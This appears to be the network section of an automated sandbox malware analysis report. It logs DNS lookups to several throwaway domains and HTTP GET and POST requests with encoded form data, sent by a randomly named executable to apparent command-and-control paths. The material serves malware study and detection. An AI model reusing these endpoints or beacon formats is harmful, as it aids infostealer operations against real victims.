                                                                                                    Dec 3, 2024 14:17:34.812530041 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:34.812539101 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:34.812659979 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:34.812705040 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:34.812733889 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:34.812768936 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:34.812781096 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:34.812822104 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:34.857031107 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:34.857074022 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:34.857085943 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:34.857176065 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:34.857223988 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:34.857261896 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:34.932792902 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:34.932879925 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:34.932981968 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:34.936954975 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:34.976840973 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.013740063 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.013783932 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.013883114 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.017842054 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.017946959 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.018080950 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.026279926 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.029356003 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.029372931 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.029411077 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.037729979 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.037796021 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.037843943 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.061078072 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.061142921 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.061243057 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.066667080 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.066679955 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.066741943 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.074091911 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.074105024 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.074208021 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.082375050 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.082446098 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.082815886 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.090642929 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.090704918 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.090771914 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.097887039 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.097990990 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.103538990 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.103703022 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.103790998 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.135377884 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.135488987 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.135602951 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.139477968 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.179975033 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.215426922 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.215993881 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.216120958 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.218437910 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.218657017 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.218703985 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.224251986 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.224339008 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.224435091 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.227540016 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:35.227617979 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.228452921 CET4973780192.168.2.8208.91.197.27
                                                                                                    Dec 3, 2024 14:17:35.348709106 CET8049737208.91.197.27192.168.2.8
                                                                                                    Dec 3, 2024 14:17:40.744215965 CET4973880192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:40.864424944 CET8049738185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:40.864626884 CET4973880192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:40.878516912 CET4973880192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:41.000349998 CET8049738185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:42.175770044 CET8049738185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:42.175851107 CET8049738185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:42.176033020 CET4973880192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:42.383630991 CET4973880192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:43.402770996 CET4973980192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:43.522996902 CET8049739185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:43.525358915 CET4973980192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:43.540066004 CET4973980192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:43.660986900 CET8049739185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:44.847474098 CET8049739185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:44.847516060 CET8049739185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:44.847594023 CET4973980192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:45.055284023 CET4973980192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:46.073724031 CET4974080192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:46.193880081 CET8049740185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:46.194052935 CET4974080192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:46.210248947 CET4974080192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:46.330830097 CET8049740185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:46.330847025 CET8049740185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:47.540468931 CET8049740185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:47.540482998 CET8049740185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:47.540608883 CET4974080192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:47.711446047 CET4974080192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:48.732163906 CET4974180192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:48.852413893 CET8049741185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:48.852509975 CET4974180192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:48.864129066 CET4974180192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:48.984282970 CET8049741185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:50.259577990 CET8049741185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:50.259618998 CET8049741185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:50.259629011 CET8049741185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:50.259871006 CET8049741185.101.158.113192.168.2.8
                                                                                                    Dec 3, 2024 14:17:50.260075092 CET4974180192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:50.260075092 CET4974180192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:50.268306017 CET4974180192.168.2.8185.101.158.113
                                                                                                    Dec 3, 2024 14:17:50.388897896 CET8049741185.101.158.113192.168.2.8
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Dec 3, 2024 14:15:50.118592978 CET5471253192.168.2.81.1.1.1
                                                                                                    Dec 3, 2024 14:15:50.611563921 CET53547121.1.1.1192.168.2.8
                                                                                                    Dec 3, 2024 14:16:07.449295044 CET6340653192.168.2.81.1.1.1
                                                                                                    Dec 3, 2024 14:16:08.169761896 CET53634061.1.1.1192.168.2.8
                                                                                                    Dec 3, 2024 14:16:22.751704931 CET5923253192.168.2.81.1.1.1
                                                                                                    Dec 3, 2024 14:16:23.194787025 CET53592321.1.1.1192.168.2.8
                                                                                                    Dec 3, 2024 14:16:37.694000959 CET5899353192.168.2.81.1.1.1
                                                                                                    Dec 3, 2024 14:16:38.534827948 CET53589931.1.1.1192.168.2.8
                                                                                                    Dec 3, 2024 14:16:53.449198961 CET5252353192.168.2.81.1.1.1
                                                                                                    Dec 3, 2024 14:16:54.465421915 CET5252353192.168.2.81.1.1.1
                                                                                                    Dec 3, 2024 14:16:54.722958088 CET53525231.1.1.1192.168.2.8
                                                                                                    Dec 3, 2024 14:16:54.722966909 CET53525231.1.1.1192.168.2.8
                                                                                                    Dec 3, 2024 14:17:09.480254889 CET5710453192.168.2.81.1.1.1
                                                                                                    Dec 3, 2024 14:17:09.907721996 CET53571041.1.1.1192.168.2.8
                                                                                                    Dec 3, 2024 14:17:24.308434010 CET5116653192.168.2.81.1.1.1
                                                                                                    Dec 3, 2024 14:17:24.897928953 CET53511661.1.1.1192.168.2.8
                                                                                                    Dec 3, 2024 14:17:40.254743099 CET5486553192.168.2.81.1.1.1
                                                                                                    Dec 3, 2024 14:17:40.716602087 CET53548651.1.1.1192.168.2.8
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Dec 3, 2024 14:15:50.118592978 CET192.168.2.81.1.1.10xc80bStandard query (0)www.pbfgm.xyzA (IP address)IN (0x0001)false
                                                                                                    Dec 3, 2024 14:16:07.449295044 CET192.168.2.81.1.1.10xb5d6Standard query (0)www.phdcoach.proA (IP address)IN (0x0001)false
                                                                                                    Dec 3, 2024 14:16:22.751704931 CET192.168.2.81.1.1.10x935Standard query (0)www.elinor.clubA (IP address)IN (0x0001)false
                                                                                                    Dec 3, 2024 14:16:37.694000959 CET192.168.2.81.1.1.10x644fStandard query (0)www.smalleyes.icuA (IP address)IN (0x0001)false
                                                                                                    Dec 3, 2024 14:16:53.449198961 CET192.168.2.81.1.1.10xaed1Standard query (0)www.btblxhh.topA (IP address)IN (0x0001)false
                                                                                                    Dec 3, 2024 14:16:54.465421915 CET192.168.2.81.1.1.10xaed1Standard query (0)www.btblxhh.topA (IP address)IN (0x0001)false
                                                                                                    Dec 3, 2024 14:17:09.480254889 CET192.168.2.81.1.1.10x83b9Standard query (0)www.primespot.liveA (IP address)IN (0x0001)false
                                                                                                    Dec 3, 2024 14:17:24.308434010 CET192.168.2.81.1.1.10x7231Standard query (0)www.mohawktooldie.onlineA (IP address)IN (0x0001)false
                                                                                                    Dec 3, 2024 14:17:40.254743099 CET192.168.2.81.1.1.10xa7d9Standard query (0)www.graviton.energyA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Dec 3, 2024 14:15:50.611563921 CET1.1.1.1192.168.2.80xc80bNo error (0)www.pbfgm.xyz172.67.218.146A (IP address)IN (0x0001)false
                                                                                                    Dec 3, 2024 14:15:50.611563921 CET1.1.1.1192.168.2.80xc80bNo error (0)www.pbfgm.xyz104.21.86.111A (IP address)IN (0x0001)false
                                                                                                    Dec 3, 2024 14:16:08.169761896 CET1.1.1.1192.168.2.80xb5d6No error (0)www.phdcoach.pro178.172.160.30A (IP address)IN (0x0001)false
                                                                                                    Dec 3, 2024 14:16:23.194787025 CET1.1.1.1192.168.2.80x935No error (0)www.elinor.club194.58.112.174A (IP address)IN (0x0001)false
                                                                                                    Dec 3, 2024 14:16:38.534827948 CET1.1.1.1192.168.2.80x644fNo error (0)www.smalleyes.icu134.122.191.187A (IP address)IN (0x0001)false
                                                                                                    Dec 3, 2024 14:16:54.722958088 CET1.1.1.1192.168.2.80xaed1No error (0)www.btblxhh.top156.234.28.101A (IP address)IN (0x0001)false
                                                                                                    Dec 3, 2024 14:16:54.722966909 CET1.1.1.1192.168.2.80xaed1No error (0)www.btblxhh.top156.234.28.101A (IP address)IN (0x0001)false
                                                                                                    Dec 3, 2024 14:17:09.907721996 CET1.1.1.1192.168.2.80x83b9No error (0)www.primespot.live209.74.79.42A (IP address)IN (0x0001)false
                                                                                                    Dec 3, 2024 14:17:24.897928953 CET1.1.1.1192.168.2.80x7231No error (0)www.mohawktooldie.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                    Dec 3, 2024 14:17:40.716602087 CET1.1.1.1192.168.2.80xa7d9No error (0)www.graviton.energy185.101.158.113A (IP address)IN (0x0001)false
                                                                                                    • www.pbfgm.xyz
                                                                                                    • www.phdcoach.pro
                                                                                                    • www.elinor.club
                                                                                                    • www.smalleyes.icu
                                                                                                    • www.btblxhh.top
                                                                                                    • www.primespot.live
                                                                                                    • www.mohawktooldie.online
                                                                                                    • www.graviton.energy
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.849713172.67.218.146805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:15:50.817111969 CET558OUTGET /fjd6/?uZ9=wvL0WTq0tnld4P&1JgHkl=beVfoldUF3/aok0KBGpVP1gUCt6NMj5apzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK2HRrufKZisD26p6RGVEvaASN7Xi+5siy6qQN86qnR0uMGQ== HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Host: www.pbfgm.xyz
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Dec 3, 2024 14:15:52.395817041 CET1236INHTTP/1.1 404 Not Found
                                                                                                    Date: Tue, 03 Dec 2024 13:15:52 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wglKkYd8WMmpy7vQ8L2rxbNGVU1FbJVBLRd%2BqdmuFtWpsdST8LcQd7Zb%2B7f6yDmdDr3JwzrGrfeBTlevNKyYTHz2A6t2b0KrDYHhh44DEMcFrolyMX%2FTq3PnFFvKA9Y%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8ec3d3f06b704233-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1884&min_rtt=1884&rtt_var=942&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=558&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                    Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                    Data Ascii: 228<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendl
                                                                                                    Dec 3, 2024 14:15:52.395853996 CET92INData Raw: 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d
                                                                                                    Data Ascii: y error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.849714178.172.160.30805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:16:08.308140993 CET814OUTPOST /izsd/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.phdcoach.pro
                                                                                                    Origin: http://www.phdcoach.pro
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 207
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.phdcoach.pro/izsd/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 38 6c 53 65 43 4a 58 2b 51 68 47 68 59 33 6e 6a 34 6c 53 43 35 50 59 63 30 46 4a 4c 67 33 50 4d 64 69 77 53 47 35 39 78 7a 77 76 51 32 77 7a 48 41 43 57 38 33 4a 33 4a 72 51 2b 53 68 71 63 62 67 2b 2b 4e 49 44 32 78 49 48 30 4e 34 67 6b 6f 53 6a 76 74 70 2f 49 41 68 55 45 4e 32 70 46 73 4c 46 38 55 65 4d 56 55 46 44 5a 59 43 55 30 50 65 63 6a 68 35 46 32 34 32 34 39 4f 39 2b 6e 6b 55 42 6c 4c 6e 69 43 32 6b 4d 72 79 62 6e 76 74 42 67 2b 2f 59 48 62 6d 2b 53 38 6c 67 61 50 52 61 76 77 58 67 72 31 57 6b 6e 49 35 43 41 4e 75 63 31 63 4b 76 46 6e 6e 77 59 7a 79 44 64 41 62 6b 74 69 77 69 6d 6f 3d
                                                                                                    Data Ascii: 1JgHkl=8lSeCJX+QhGhY3nj4lSC5PYc0FJLg3PMdiwSG59xzwvQ2wzHACW83J3JrQ+Shqcbg++NID2xIH0N4gkoSjvtp/IAhUEN2pFsLF8UeMVUFDZYCU0Pecjh5F24249O9+nkUBlLniC2kMrybnvtBg+/YHbm+S8lgaPRavwXgr1WknI5CANuc1cKvFnnwYzyDdAbktiwimo=
                                                                                                    Dec 3, 2024 14:16:09.697478056 CET691INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:09 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 548
                                                                                                    Connection: close
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.849715178.172.160.30805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:16:11.043417931 CET834OUTPOST /izsd/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.phdcoach.pro
                                                                                                    Origin: http://www.phdcoach.pro
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 227
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.phdcoach.pro/izsd/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 38 6c 53 65 43 4a 58 2b 51 68 47 68 5a 57 58 6a 31 6d 4b 43 79 50 59 54 71 56 4a 4c 72 58 50 49 64 69 38 53 47 39 46 68 7a 6c 48 51 32 53 72 48 50 6a 57 38 32 4a 33 4a 6a 77 2b 62 38 36 63 51 67 2b 7a 77 49 42 53 78 49 44 63 4e 34 69 4d 6f 52 55 37 73 7a 50 49 34 34 6b 45 50 37 4a 46 73 4c 46 38 55 65 4d 77 78 46 44 42 59 43 6e 73 50 63 39 6a 69 69 6c 32 37 2f 59 39 4f 35 2b 6e 61 55 42 6c 6c 6e 67 32 63 6b 4f 44 79 62 6d 66 74 43 78 2b 38 53 48 61 74 77 79 39 51 75 4a 4b 47 51 4f 67 37 38 35 78 30 6a 68 59 46 44 32 38 45 47 58 55 4d 73 46 50 4d 77 62 62 45 47 71 64 7a 2b 4f 79 41 38 78 2b 62 44 58 37 4f 54 2b 45 72 5a 71 4b 4b 67 6b 41 44 33 67 2f 4c
                                                                                                    Data Ascii: 1JgHkl=8lSeCJX+QhGhZWXj1mKCyPYTqVJLrXPIdi8SG9FhzlHQ2SrHPjW82J3Jjw+b86cQg+zwIBSxIDcN4iMoRU7szPI44kEP7JFsLF8UeMwxFDBYCnsPc9jiil27/Y9O5+naUBllng2ckODybmftCx+8SHatwy9QuJKGQOg785x0jhYFD28EGXUMsFPMwbbEGqdz+OyA8x+bDX7OT+ErZqKKgkAD3g/L
                                                                                                    Dec 3, 2024 14:16:12.321470976 CET691INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:12 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 548
                                                                                                    Connection: close
